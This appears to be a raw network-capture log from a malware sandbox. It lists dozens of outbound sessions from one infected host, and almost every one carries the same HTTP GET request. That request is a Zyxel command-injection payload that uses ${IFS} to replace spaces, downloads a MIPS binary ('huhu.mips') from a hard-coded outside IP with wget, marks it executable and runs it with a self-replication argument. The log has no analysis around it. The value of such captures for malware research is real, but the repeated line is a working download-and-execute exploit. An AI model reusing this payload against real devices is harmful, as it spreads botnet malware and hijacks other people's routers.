                                                  Jan 19, 2024 18:23:54.021680117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4072192.168.2.13606662.162.153.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.021748066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4073192.168.2.1334612173.193.26.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.030690908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4074192.168.2.1356214106.17.67.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.030755997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4075192.168.2.1359166197.133.146.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.030880928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4076192.168.2.135300231.100.104.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.030906916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4077192.168.2.133565832.17.144.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.030944109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4078192.168.2.134347651.119.139.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031002998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4079192.168.2.1360728126.229.16.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031040907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4080192.168.2.1334546109.39.236.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031097889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4081192.168.2.1344114207.111.118.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031136990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4082192.168.2.1344320129.202.147.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031193018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4083192.168.2.1359750115.194.169.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031239033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4084192.168.2.1342100116.190.236.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031291962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4085192.168.2.1334266152.231.208.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031328917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4086192.168.2.1351976138.134.94.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031374931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4087192.168.2.133863654.19.30.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031418085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4088192.168.2.1345770175.148.100.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031466961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4089192.168.2.1358312203.64.43.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031502962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4090192.168.2.1340036158.113.144.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031542063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4091192.168.2.1343348124.200.241.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031569958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4092192.168.2.133598085.6.180.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031598091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4093192.168.2.136056449.156.255.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031649113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4094192.168.2.1353168187.9.68.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031692028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4095192.168.2.134331479.67.17.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031737089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4096192.168.2.1342554212.227.154.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031783104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4097192.168.2.1349014138.130.162.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031831026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4098192.168.2.1359944134.156.197.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031873941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4099192.168.2.135872453.229.132.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031935930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4100192.168.2.133438671.173.64.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.031982899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4101192.168.2.1335460220.11.192.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032027960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4102192.168.2.13441382.34.0.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032083035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4103192.168.2.133547863.172.170.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032119989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4104192.168.2.1355670131.86.248.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032166004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4105192.168.2.133646817.167.223.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032213926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4106192.168.2.1343632148.35.135.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032246113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4107192.168.2.1358064134.242.168.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032285929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4108192.168.2.1341472123.31.138.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032321930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4109192.168.2.13581109.41.148.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032370090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4110192.168.2.1338730163.75.32.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032412052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4111192.168.2.1344536177.180.20.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032480001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4112192.168.2.1349166176.93.165.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032516956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4113192.168.2.1333416187.111.9.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032577991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4114192.168.2.1346454171.42.230.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032608032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4115192.168.2.1344454139.168.106.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032644033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4116192.168.2.1353330162.34.111.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032687902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4117192.168.2.1349536161.42.111.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032735109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4118192.168.2.133606837.57.166.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032758951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4119192.168.2.1341820190.160.186.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032807112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4120192.168.2.135836834.73.45.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032845974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4121192.168.2.1349200132.243.174.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032880068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4122192.168.2.134945665.128.132.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032919884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4123192.168.2.1350470184.69.10.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032943010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4124192.168.2.133633431.177.98.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.032973051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4125192.168.2.134847639.165.150.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033027887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4126192.168.2.13575905.60.9.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033076048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4127192.168.2.1341612141.249.9.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033106089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4128192.168.2.1349666116.250.93.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033142090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4129192.168.2.13488445.48.255.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033180952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4130192.168.2.133476431.30.240.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033222914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4131192.168.2.1342574106.1.139.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033257008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4132192.168.2.134041860.111.231.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033291101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4133192.168.2.1342586162.22.179.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033332109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4134192.168.2.135726879.254.52.83443
                                                  TimestampBytes transferredDirectionData
